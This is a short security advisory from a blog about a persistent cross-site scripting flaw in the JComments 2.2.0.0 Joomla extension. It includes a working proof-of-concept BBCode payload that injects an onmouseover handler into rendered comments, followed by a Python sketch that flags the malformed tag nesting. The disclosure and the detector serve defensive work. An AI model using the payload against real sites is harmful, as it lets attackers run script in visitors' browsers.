jeffchannell.com

JComments 2.2.0.0 Persistent XSS

Posted in Joomla!
2010-09-05 18:55:54 +0000 UTC

JComments 2.2.0.0 suffers from a persistent XSS vulnerability in the way it handles certain BBCodes.

If [url] and [img] tags are available, the following malformed BBCode will result in JavaScript execution in the browser:

123456789 12345678 123456789 123456789 123456789 123456789 123456789 123456789 123456789 123456789 123456789 123456789 123456789
[url]x[url]s[/url]s[/url]!
" style="position: absolute; top:0px; left:0px; width: 99em; height: 99em" onmouseover = "location.href = String.fromCharCode( 35,88,83, 83,101, 100,32, 98,121, 32,106, 100,99 )" x="
[url]x[img]s[/url]s[/img]="!">
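
The two BBCode lines above share a structural property that can be checked before rendering: a [url] opened inside another [url], and a [url] and [img] that overlap instead of nesting. The following is an added example, not code from the original post or from JComments (whose parser the page does not show); the function name and the rule that [url] and [img] may contain only plain text are assumptions of this sketch.

```python
import re

# Tags named in the advisory; a real BBCode set would be larger.
TAGS = {"url", "img"}
# Matches [tag], [/tag] and [tag=value].
TOKEN = re.compile(r"\[(/?)(\w+)(?:=[^\]]*)?\]", re.IGNORECASE)


def bbcode_nesting_errors(text, no_children=TAGS):
    """Return a list of structural problems found in the BBCode of `text`.

    Tags in `no_children` must contain plain text only (assumed policy),
    which rejects both [url]..[url] nesting and [url]..[img] overlap.
    """
    errors, stack = [], []
    for m in TOKEN.finditer(text):
        closing, name = m.group(1) == "/", m.group(2).lower()
        if name not in TAGS:
            continue
        if not closing:
            if stack and stack[-1] in no_children:
                errors.append(f"[{name}] opened inside [{stack[-1]}] at offset {m.start()}")
            stack.append(name)
        elif not stack:
            errors.append(f"[/{name}] without an opening tag at offset {m.start()}")
        elif stack[-1] != name:
            errors.append(f"[/{name}] closes [{stack[-1]}] at offset {m.start()}")
            if name in stack:
                # Unwind to the matching opener so later tags are judged fairly.
                while stack.pop() != name:
                    pass
        else:
            stack.pop()
    errors.extend(f"[{name}] never closed" for name in stack)
    return errors


# The first two samples are the BBCode lines quoted in the post;
# the third is a constructed, well-formed comment.
SAMPLES = [
    '[url]x[url]s[/url]s[/url]!',
    '[url]x[img]s[/url]s[/img]="!">',
    'See [url]http://example.com/[/url] [img]http://example.com/a.png[/img]',
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, "->", bbcode_nesting_errors(sample) or "ok")
```

A comment for which the function returns a non-empty list can be rejected or stored as escaped plain text instead of being passed to the BBCode renderer.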

Timeline